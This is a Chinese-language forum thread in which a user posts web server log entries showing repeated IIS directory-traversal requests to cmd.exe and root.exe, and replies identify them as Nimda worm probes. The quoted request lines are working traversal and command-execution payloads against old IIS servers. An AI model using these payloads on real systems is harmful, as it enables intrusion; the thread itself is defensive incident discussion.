k*n
2 楼
有个IP不停的向我的server发这样的信号:
(从httpd log里看见的)
"GET /scripts/root.exe?/c+dir HTTP/1.0"
"GET /MSADC/root.exe?/c+dir HTTP/1.0"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
等等等等.
(从httpd log里看见的)
"GET /scripts/root.exe?/c+dir HTTP/1.0"
"GET /MSADC/root.exe?/c+dir HTTP/1.0"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
等等等等.
m*n
3 楼
别去
w*n
4 楼
Yes, it might be a tool or worm though...
【在 k**n 的大作中提到】
: 有个IP不停的向我的server发这样的信号:
: (从httpd log里看见的)
: "GET /scripts/root.exe?/c+dir HTTP/1.0"
: "GET /MSADC/root.exe?/c+dir HTTP/1.0"
: "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
p*r
5 楼
是,正在寻找IIS Web Server的漏洞
HTTP/1.0"
【在 w*****n 的大作中提到】
:
: Yes, it might be a tool or worm though...
HTTP/1.0"
【在 w*****n 的大作中提到】
:
: Yes, it might be a tool or worm though...
M*t
6 楼
that server was infected by Nimda...
【在 k**n 的大作中提到】
: 有个IP不停的向我的server发这样的信号:
: (从httpd log里看见的)
: "GET /scripts/root.exe?/c+dir HTTP/1.0"
: "GET /MSADC/root.exe?/c+dir HTTP/1.0"
: "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
【在 k**n 的大作中提到】
: 有个IP不停的向我的server发这样的信号:
: (从httpd log里看见的)
: "GET /scripts/root.exe?/c+dir HTTP/1.0"
: "GET /MSADC/root.exe?/c+dir HTTP/1.0"
: "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
M*t
7 楼
看看有没有200啊?
看看你的C盘被共享了吗?
【在 k**n 的大作中提到】
: 有个IP不停的向我的server发这样的信号:
: (从httpd log里看见的)
: "GET /scripts/root.exe?/c+dir HTTP/1.0"
: "GET /MSADC/root.exe?/c+dir HTTP/1.0"
: "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
看看你的C盘被共享了吗?
【在 k**n 的大作中提到】
: 有个IP不停的向我的server发这样的信号:
: (从httpd log里看见的)
: "GET /scripts/root.exe?/c+dir HTTP/1.0"
: "GET /MSADC/root.exe?/c+dir HTTP/1.0"
: "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
相关阅读
为什么不开个黑客版?其实现在的版和黑客版没什么区别?这个有没有关系IE Problem这是什么病毒?MD5这又是什么病毒? 求救有个网络安全的问题想请教大家,请帮忙回答一下把!anybody crack dishnetwork?Outbound 1434 UDPI solved the problemlooking for virus/worms我所有的网上帐号全登不上去了,why?请教哪里有卖COMCAST CABLE数字电视的解码盒子的用什么破解工具呀?How to solve this problem about Internet这是病毒吗?(Inbound UDP packet)norton cannot be run请问局域网内邮件[转载] RAS, please consider these complaints.[转载] svchost.exe让XP变得极慢